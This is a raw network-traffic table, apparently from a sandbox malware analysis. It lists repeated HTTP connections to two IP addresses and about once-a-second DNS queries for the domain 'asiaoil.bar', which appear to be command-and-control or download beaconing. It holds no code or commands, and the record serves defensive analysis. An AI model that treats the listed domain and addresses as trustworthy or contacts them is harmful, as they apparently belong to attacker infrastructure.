                        Feb 10, 2022 10:23:25.631509066 CET4924080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:25.647947073 CET8049240172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:26.737293959 CET4924180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:26.753781080 CET8049241104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:26.753931046 CET4924180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:26.759434938 CET4924180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:26.775726080 CET8049241104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:26.775861025 CET4924180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:26.792222977 CET8049241104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:26.868480921 CET8049241104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:26.868607044 CET4924180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:26.868662119 CET8049241104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:26.868722916 CET4924180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:26.884802103 CET8049241104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:27.782962084 CET4924280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:27.799365997 CET8049242104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:27.799454927 CET4924280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:27.802325010 CET4924280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:27.818553925 CET8049242104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:27.818645954 CET4924280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:27.834830046 CET8049242104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:27.877187014 CET8049242104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:27.877285004 CET8049242104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:27.877362967 CET4924280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:27.877413988 CET4924280192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:27.893657923 CET8049242104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:28.779360056 CET4924380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:28.795767069 CET8049243172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:28.797405005 CET4924380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:28.801702023 CET4924380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:28.817826986 CET8049243172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:28.817922115 CET4924380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:28.834218025 CET8049243172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:28.894922972 CET8049243172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:28.894951105 CET8049243172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:28.895071983 CET4924380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:28.895138025 CET4924380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:28.911288023 CET8049243172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:29.771261930 CET4924480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:29.787571907 CET8049244172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:29.787746906 CET4924480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:29.791358948 CET4924480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:29.808774948 CET8049244172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:29.808893919 CET4924480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:29.825114012 CET8049244172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:29.883049011 CET8049244172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:29.883095980 CET8049244172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:29.883198977 CET4924480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:29.883251905 CET4924480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:29.900052071 CET8049244172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:30.781567097 CET4924580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:30.798001051 CET8049245172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:30.798521042 CET4924580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:30.804450989 CET4924580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:30.821108103 CET8049245172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:30.822309017 CET4924580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:30.838979959 CET8049245172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:30.900362015 CET8049245172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:30.900401115 CET8049245172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:30.900660038 CET4924580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:30.900791883 CET4924580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:30.917085886 CET8049245172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:31.822593927 CET4924680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:31.838879108 CET8049246172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:31.839030981 CET4924680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:31.841167927 CET4924680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:31.857358932 CET8049246172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:31.857433081 CET4924680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:31.873650074 CET8049246172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:31.928236961 CET8049246172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:31.928287029 CET8049246172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:31.928415060 CET4924680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:31.928477049 CET4924680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:31.944920063 CET8049246172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:32.841248035 CET4924780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:32.857985020 CET8049247172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:32.858127117 CET4924780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:32.863722086 CET4924780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:32.880431890 CET8049247172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:32.880721092 CET4924780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:32.897351980 CET8049247172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:33.037036896 CET8049247172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:33.037060976 CET8049247172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:33.037200928 CET4924780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:33.037257910 CET4924780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:33.054289103 CET8049247172.67.197.66192.168.2.22

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Feb 10, 2022 10:21:59.657758951 CET5216753192.168.2.228.8.8.8
                        Feb 10, 2022 10:21:59.679673910 CET53521678.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:02.798513889 CET5059153192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:02.820064068 CET53505918.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:03.787553072 CET5780553192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:03.806817055 CET53578058.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:04.872561932 CET5903053192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:04.893670082 CET53590308.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:05.912199020 CET5918553192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:05.933922052 CET53591858.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:06.966857910 CET5561653192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:06.985570908 CET53556168.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:08.076816082 CET4997253192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:08.106977940 CET53499728.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:09.230184078 CET5177153192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:09.252610922 CET53517718.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:10.377916098 CET5986753192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:10.394609928 CET53598678.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:11.444910049 CET5031553192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:11.461467028 CET53503158.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:12.512779951 CET5007253192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:12.531579971 CET53500728.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:13.589272022 CET5430453192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:13.606112957 CET53543048.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:14.746339083 CET4989453192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:14.763432026 CET53498948.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:15.840691090 CET6464553192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:15.859421015 CET53646458.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:17.182943106 CET5374553192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:17.201698065 CET53537458.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:18.547647953 CET5435853192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:18.564426899 CET53543588.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:20.264818907 CET6501753192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:20.282020092 CET53650178.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:21.332977057 CET5834153192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:21.349742889 CET53583418.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:22.452615976 CET5638353192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:22.469295979 CET53563838.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:23.465867043 CET6217253192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:23.484388113 CET53621728.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:24.550992012 CET6085953192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:24.567791939 CET53608598.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:25.553512096 CET5905553192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:25.572346926 CET53590558.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:26.633922100 CET6006453192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:26.651072025 CET53600648.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:27.648459911 CET5168953192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:27.667135954 CET53516898.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:29.048799038 CET5500053192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:29.064960003 CET53550008.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:30.756577969 CET6418753192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:30.776675940 CET53641878.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:31.841069937 CET5944953192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:31.858690977 CET53594498.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:32.912058115 CET5842453192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:32.930648088 CET53584248.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:33.968051910 CET6243153192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:33.985292912 CET53624318.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:35.016231060 CET5287953192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:35.035057068 CET53528798.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:36.033919096 CET6007453192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:36.052189112 CET53600748.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:37.078222036 CET5150653192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:37.097563982 CET53515068.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:38.129494905 CET5061553192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:38.148770094 CET53506158.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:39.180749893 CET5901253192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:39.203105927 CET53590128.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:40.243946075 CET6273853192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:40.399499893 CET53627388.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:41.397644043 CET5999253192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:41.416198015 CET53599928.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:42.486350060 CET5412853192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:42.509901047 CET53541288.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:43.505530119 CET5286053192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:43.524178982 CET53528608.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:44.545278072 CET6174253192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:44.563961983 CET53617428.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:45.600828886 CET5310653192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:45.620157957 CET53531068.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:46.679800987 CET5107153192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:46.698565960 CET53510718.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:47.694005966 CET5522553192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:47.712665081 CET53552258.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:48.794428110 CET5182253192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:48.813474894 CET53518228.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:49.859730005 CET5720653192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:49.878983974 CET53572068.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:51.002474070 CET6147153192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:51.019309044 CET53614718.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:52.024955988 CET6258453192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:52.041841030 CET53625848.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:53.105232000 CET5415153192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:53.123905897 CET53541518.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:54.168021917 CET6531753192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:54.186261892 CET53653178.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:55.185018063 CET5772253192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:55.202280998 CET53577228.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:56.195903063 CET6471553192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:56.214804888 CET53647158.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:57.314579964 CET5620753192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:57.333787918 CET53562078.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:58.398493052 CET6496353192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:58.417352915 CET53649638.8.8.8192.168.2.22
                        Feb 10, 2022 10:22:59.502744913 CET6537953192.168.2.228.8.8.8
                        Feb 10, 2022 10:22:59.519994974 CET53653798.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:00.513632059 CET5623353192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:00.533606052 CET53562338.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:01.576647043 CET6070653192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:01.595443010 CET53607068.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:02.585699081 CET4936653192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:02.604903936 CET53493668.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:03.632282972 CET5014153192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:03.649529934 CET53501418.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:04.624403954 CET5206953192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:04.640897036 CET53520698.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:05.917184114 CET6378853192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:05.934077978 CET53637888.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:08.555697918 CET5319053192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:08.573890924 CET53531908.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:09.629110098 CET5671953192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:09.647778988 CET53567198.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:10.670913935 CET5758453192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:10.689938068 CET53575848.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:11.707644939 CET5081553192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:11.726572037 CET53508158.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:12.786386967 CET5809353192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:12.805661917 CET53580938.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:13.874433041 CET6090253192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:13.894022942 CET53609028.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:14.890866041 CET5371053192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:14.907351017 CET53537108.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:16.130302906 CET5890853192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:16.148524046 CET53589088.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:17.382666111 CET5034653192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:17.401235104 CET53503468.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:18.736026049 CET6022153192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:18.763688087 CET53602218.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:19.799702883 CET5571353192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:19.818831921 CET53557138.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:20.931313992 CET6339853192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:20.950112104 CET53633988.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:22.033031940 CET5569353192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:22.051954985 CET53556938.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:23.098339081 CET5997953192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:23.115072966 CET53599798.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:25.154160023 CET6499553192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:25.172872066 CET53649958.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:26.716438055 CET5328953192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:26.735743999 CET53532898.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:27.763015032 CET6257853192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:27.781708956 CET53625788.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:28.759797096 CET5010853192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:28.778294086 CET53501088.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:29.753248930 CET5360553192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:29.769979954 CET53536058.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:30.760308981 CET5159353192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:30.778796911 CET53515938.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:31.802032948 CET5015753192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:31.820941925 CET53501578.8.8.8192.168.2.22
                        Feb 10, 2022 10:23:32.823729992 CET5395253192.168.2.228.8.8.8
                        Feb 10, 2022 10:23:32.840801001 CET53539528.8.8.8192.168.2.22

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Feb 10, 2022 10:21:59.657758951 CET192.168.2.228.8.8.80x9747Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:02.798513889 CET192.168.2.228.8.8.80x71fStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:03.787553072 CET192.168.2.228.8.8.80xa539Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:04.872561932 CET192.168.2.228.8.8.80xa7ceStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:05.912199020 CET192.168.2.228.8.8.80xe425Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:06.966857910 CET192.168.2.228.8.8.80x51a3Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:08.076816082 CET192.168.2.228.8.8.80x49f3Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:09.230184078 CET192.168.2.228.8.8.80x2021Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:10.377916098 CET192.168.2.228.8.8.80xe478Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:11.444910049 CET192.168.2.228.8.8.80xd27fStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:12.512779951 CET192.168.2.228.8.8.80xa6adStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:13.589272022 CET192.168.2.228.8.8.80x1d7bStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:14.746339083 CET192.168.2.228.8.8.80xc406Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:15.840691090 CET192.168.2.228.8.8.80x45dcStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:17.182943106 CET192.168.2.228.8.8.80xb6dcStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:18.547647953 CET192.168.2.228.8.8.80xbbf0Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:20.264818907 CET192.168.2.228.8.8.80x795eStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:21.332977057 CET192.168.2.228.8.8.80xeeebStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:22.452615976 CET192.168.2.228.8.8.80xe527Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:23.465867043 CET192.168.2.228.8.8.80xfad8Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:24.550992012 CET192.168.2.228.8.8.80xc89cStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:25.553512096 CET192.168.2.228.8.8.80xe031Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:26.633922100 CET192.168.2.228.8.8.80x61b1Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:27.648459911 CET192.168.2.228.8.8.80xe5e0Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:29.048799038 CET192.168.2.228.8.8.80x1048Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:30.756577969 CET192.168.2.228.8.8.80x5557Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:31.841069937 CET192.168.2.228.8.8.80x74efStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:32.912058115 CET192.168.2.228.8.8.80x14c8Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:33.968051910 CET192.168.2.228.8.8.80x860fStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:35.016231060 CET192.168.2.228.8.8.80xfea3Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:36.033919096 CET192.168.2.228.8.8.80x2516Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:37.078222036 CET192.168.2.228.8.8.80xff8aStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:38.129494905 CET192.168.2.228.8.8.80x7ac5Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:39.180749893 CET192.168.2.228.8.8.80xb649Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:40.243946075 CET192.168.2.228.8.8.80x55b7Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:41.397644043 CET192.168.2.228.8.8.80x9913Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:42.486350060 CET192.168.2.228.8.8.80xd5cfStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:43.505530119 CET192.168.2.228.8.8.80xe474Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:44.545278072 CET192.168.2.228.8.8.80xd627Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:45.600828886 CET192.168.2.228.8.8.80xffb2Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:46.679800987 CET192.168.2.228.8.8.80x24d3Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:47.694005966 CET192.168.2.228.8.8.80x664bStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:48.794428110 CET192.168.2.228.8.8.80xc7a4Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:49.859730005 CET192.168.2.228.8.8.80x3468Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:51.002474070 CET192.168.2.228.8.8.80xfa95Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:52.024955988 CET192.168.2.228.8.8.80xd853Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:53.105232000 CET192.168.2.228.8.8.80xc5beStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:54.168021917 CET192.168.2.228.8.8.80x412aStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:55.185018063 CET192.168.2.228.8.8.80x6266Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:56.195903063 CET192.168.2.228.8.8.80xfd14Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:57.314579964 CET192.168.2.228.8.8.80x8b69Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:58.398493052 CET192.168.2.228.8.8.80xe59eStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:59.502744913 CET192.168.2.228.8.8.80x3e6Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:00.513632059 CET192.168.2.228.8.8.80x37b5Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:01.576647043 CET192.168.2.228.8.8.80x92dcStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:02.585699081 CET192.168.2.228.8.8.80xdcc3Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:03.632282972 CET192.168.2.228.8.8.80x5c5aStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:04.624403954 CET192.168.2.228.8.8.80x314dStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:05.917184114 CET192.168.2.228.8.8.80x18fStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:08.555697918 CET192.168.2.228.8.8.80xb372Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:09.629110098 CET192.168.2.228.8.8.80x7447Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:10.670913935 CET192.168.2.228.8.8.80xebcfStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:11.707644939 CET192.168.2.228.8.8.80x56b2Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:12.786386967 CET192.168.2.228.8.8.80x8d8dStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:13.874433041 CET192.168.2.228.8.8.80xdd5aStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:14.890866041 CET192.168.2.228.8.8.80xca3fStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:16.130302906 CET192.168.2.228.8.8.80xe624Standard query (0)asiaoil.barA (IP address)IN (0x0001)
